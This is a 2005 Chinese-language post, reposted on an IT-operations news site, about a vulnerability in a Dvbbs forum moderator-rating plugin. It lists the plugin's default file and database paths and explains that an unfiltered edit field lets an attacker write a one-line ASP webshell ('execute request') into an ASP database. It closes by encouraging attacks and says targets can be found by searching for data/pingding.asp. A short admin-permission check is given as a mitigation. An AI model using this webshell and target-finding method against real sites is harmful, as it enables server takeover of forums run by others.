IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

动网的新灾难-插件漏洞

2005年12月17日
/
就是关于“斑主评定”栏目,当然是插件。
插件比较乱,有很多,比如前台就是
z_disadmin.asp
z_disadmin_edit.asp
z_disadminconn.asp
后台在data/#pingding.mdb
有的后台在data/pingding.asp
有的则在data/disadmin_db.asp
另外有的后台会这样Data_plus/something的!
当然可以暴库,关键就是z_disadminconn.asp过滤不严,但是必须要找到它的所在,而且要二级。
利用的方法:
--------------------------------
关于mdb作数据库的,那当然没什么危险,这个漏洞也只能算是个鸡肋。
但是对于asp作数据库的,却有利用的方法。
这都是因为edit中一个update的错误,大部分字段都是整型的,因为数据库的规定
而有一个字段是可以写入木马的。
虽然长度有限制,但是够写一个微型木马了,我用<%execute request("allyesno")%>
对于暂时的防范,可以在edit中加入一个过滤参数:
-----------codz begin----------------
Head()
dim admin_flag,isEdit,boname,msgtitle,msginfo,SubRs
admin_flag="22"
if not Dvbbs.master or instr(session("flag"),admin_flag)=0 then
Errmsg=ErrMsg + "<BR><li>本页面为管理员专用,请<a href=admin_index.asp target=_top>
登陆</a>后进入。<br><li>您没有管理本页面的权限。"
dvbbs_error()
end if
-------------codz end---------------
总而言之,只能说明开发插件的人头脑有问题。
虽然利用不大,扩散不广。但是还是有得玩的!
具体攻击:
应该是搜索data/pingding.asp。一般这个数据库没人改的。
发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

如何在交付周期中保护Web应用程序安全性
如何在交付周期中保护Web应用程序安全性Web应用程序是当今多数企业应用的前沿阵地。Web应用程序在一个复杂的混合性架构中...
微软加强Hotmail安全 加密通信介入
微软加强Hotmail安全 加密通信介入微软周一表示,他们计划在Hotmail中部署增强后的安全功能,确保攻击者无法实现非...

本类热点